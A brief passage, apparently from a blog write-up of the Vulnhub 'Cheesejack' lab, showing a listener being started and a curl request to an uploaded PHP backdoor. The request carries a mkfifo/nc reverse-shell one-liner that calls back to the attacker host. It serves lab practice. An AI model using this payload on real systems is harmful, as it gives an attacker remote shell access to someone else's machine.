eMVee-NL/eMVee-NL.github.io/_posts/2023-05-03-Vulnhub-Writeup-Cheesejack.md

 Ncat: Listening on 0.0.0.0:443

 ```
+Now we should run our command for a reverse shell including the data url encoding so it is executed correctly on the target.
 ```bash
 ┌──(emvee㉿kali)-[~/Documents/Vulnhub/CheeceyJack]
 └─$ curl -v http://10.0.2.42/project_management/uploads/users/639322-backdoor.php --data-urlencode "cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.2.15 443 >/tmp/f"